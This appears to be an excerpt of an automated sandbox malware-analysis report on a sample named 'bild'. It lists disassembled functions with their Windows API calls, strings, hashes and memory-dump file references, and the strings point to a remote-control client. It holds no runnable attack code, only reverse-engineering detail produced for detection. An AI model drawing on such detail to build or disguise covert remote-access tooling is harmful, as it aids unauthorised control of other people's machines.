                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$CriticalSection$EnterLeave
                                                                                    • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                    • API String ID: 956672424-625438208
                                                                                    • Opcode ID: c1740793aff0a857699f8c8da11d168052976df0f5bdff16eb1b228a2dd960db
                                                                                    • Instruction ID: 36f89d150e27e685f8f970f5604c93a837ba150e33a3fa1efe54dd65d22fc2b8
                                                                                    • Opcode Fuzzy Hash: c1740793aff0a857699f8c8da11d168052976df0f5bdff16eb1b228a2dd960db
                                                                                    • Instruction Fuzzy Hash: BA310475D042999FE315CF64C984F5AFBE6EB08328F154265E866EB290D731EC00CB90
                                                                                    Function 11017510 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 88COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InitializeStringUninitializeW@16
                                                                                    • String ID: HID$PS/2$USB$Win32_PointingDevice
                                                                                    • API String ID: 1826621714-1320232752
                                                                                    • Opcode ID: 01f4c2053d6d3d5b188b910352b3af376dde63b9f7c605ac8684b23757ecbe52
                                                                                    • Instruction ID: ec2d2041e6adeb1d612fb4c2d78acfda5a53ba2d11cec2f487d5e4dde2f70ea0
                                                                                    • Opcode Fuzzy Hash: 01f4c2053d6d3d5b188b910352b3af376dde63b9f7c605ac8684b23757ecbe52
                                                                                    • Instruction Fuzzy Hash: BE317075A0061A9BDB24DF54CD457EAB3B8EF08315F0040E9E909AB244EB75FA84CF50
                                                                                    Function 110F1270 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 85fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F12C5
                                                                                    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F12DA
                                                                                      • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                    • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1333
                                                                                    • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1378
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                    • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                    • API String ID: 1318148156-3179819359
                                                                                    • Opcode ID: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                    • Instruction ID: ccc4368b31194543ced42f6667aa0c2d7b9d0de7acad865b100199d2ac62ce57
                                                                                    • Opcode Fuzzy Hash: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                    • Instruction Fuzzy Hash: E431C171A44725AFD724DF64D891B96F7F5EB08708F008168E2B88B6C0D3B1B984CB94
                                                                                    Function 1115F100 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 1115F12E
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • SystemParametersInfoA.USER32(00002000,00000000,00000001,00000000), ref: 1115F14F
                                                                                    • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 1115F162
                                                                                    • SystemParametersInfoA.USER32(00002001,00000000,00000001,00000000), ref: 1115F177
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                    • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                    • API String ID: 3960414890-2201682149
                                                                                    • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                    • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                    • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                    • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                    Function 11003380 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110033BA
                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110033DC
                                                                                    • DestroyMenu.USER32(00000000), ref: 110033EA
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                    • API String ID: 468487828-934300333
                                                                                    • Opcode ID: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                    • Instruction ID: f68e039685e14a294959d37ff9e7a7cb7630811a32528fcef7aaec2fda1b7dd6
                                                                                    • Opcode Fuzzy Hash: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
                                                                                    • Instruction Fuzzy Hash: 2FF0E93AF8466933E312A1F53C85F5BE74C9B515ECF450031F528EAA80EE54A80041AA
                                                                                    Function 11003290 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadMenuA.USER32(00000000,00002EF9), ref: 1100329D
                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 110032C3
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 110032E7
                                                                                    • DestroyMenu.USER32(00000000), ref: 110032F9
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                    • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                    • API String ID: 4241058051-934300333
                                                                                    • Opcode ID: f8a0d47e41078153cbecec3a6fa3cf51a8fd2ba3eb994fe06476dedbffd054b5
                                                                                    • Instruction ID: ea916ae31ccda8615c5aa97c2145fcab3b24ed556d1c3993920dd856584db00e
                                                                                    • Opcode Fuzzy Hash: f8a0d47e41078153cbecec3a6fa3cf51a8fd2ba3eb994fe06476dedbffd054b5
                                                                                    • Instruction Fuzzy Hash: F8F02E3EE945BA73D31266F53C0DF8BFA584F526ACB060030F434FA645EE14A40081A6
                                                                                    Function 11119160 Relevance: 12.2, APIs: 8, Instructions: 209COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClientRect.USER32(?,00000000), ref: 11119200
                                                                                    • ClientToScreen.USER32(?,?), ref: 11119241
                                                                                    • GetCursorPos.USER32(?), ref: 111192A1
                                                                                    • GetTickCount.KERNEL32 ref: 111192B6
                                                                                    • GetTickCount.KERNEL32 ref: 11119337
                                                                                    • WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
                                                                                    • WindowFromPoint.USER32(000000FF,?), ref: 111193AE
                                                                                    • SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ClientCountCursorFromPointTickWindow$RectScreen
                                                                                    • String ID:
                                                                                    • API String ID: 4245181967-0
                                                                                    • Opcode ID: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                    • Instruction ID: c3d26e7f0e5f190f00e8d03b3c013bb68f2031b9d5661d68f26c10068d749f7e
                                                                                    • Opcode Fuzzy Hash: 838e7dc6d1b1be8e942fea838f017d3d945d3eacabb2bdd9570b2d4d2d73d52c
                                                                                    • Instruction Fuzzy Hash: 6391F6B5A0060A9FDB14DFB4D588AEEF7F5FB88314F10452ED86A9B244E735B841CB60
                                                                                    Function 11025122 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowTextA.USER32(?,?,00000050), ref: 11025176
                                                                                    • _strncat.LIBCMT ref: 1102518B
                                                                                    • SetWindowTextA.USER32(?,?), ref: 11025198
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025224
                                                                                    • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025238
                                                                                    • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025250
                                                                                    • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025262
                                                                                    • SetFocus.USER32(?), ref: 11025265
                                                                                      • Part of subcall function 11024C70: GetDlgItem.USER32(?,?), ref: 11024CC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3832070631-0
                                                                                    • Opcode ID: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                    • Instruction ID: 7712de199883e751ea03bfa735f50b434bc7bb1cc5edca5bff12a9cf5cd7df4a
                                                                                    • Opcode Fuzzy Hash: 60fab7655721e0b3046f2d3ba99d2d3761f65fbfa148eacead4071a3fd212dff
                                                                                    • Instruction Fuzzy Hash: 0E4192B5A10359ABE710DB74CC45BBAF7F8FB44714F01452AE61AD76C0EAB4A904CB50
                                                                                    Function 110573B0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 188libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,420B7E12,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
                                                                                      • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,420B7E12,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
                                                                                      • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,420B7E12,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
                                                                                      • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,420B7E12,00000000,00000001,00000000,00000000), ref: 110760A7
                                                                                      • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,420B7E12,00000000,00000001,00000000,00000000), ref: 110760FC
                                                                                      • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,420B7E12,00000000,00000001,00000000,00000000), ref: 11076105
                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
                                                                                    • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
                                                                                    • SetLastError.KERNEL32(00000078), ref: 110575F4
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 110575FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                    • String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
                                                                                    • API String ID: 3780373956-3165951319
                                                                                    • Opcode ID: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
                                                                                    • Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
                                                                                    • Opcode Fuzzy Hash: ccdea510e774544ecb2f96d5e0f14d7635a3fa6427d5c0afb47a3670e03c907f
                                                                                    • Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64
                                                                                    Function 11071500 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 176COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?,420B7E12,75BF7CB0,75BF7AA0,?,75BF7CB0,75BF7AA0), ref: 11071554
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 11071568
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110716E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
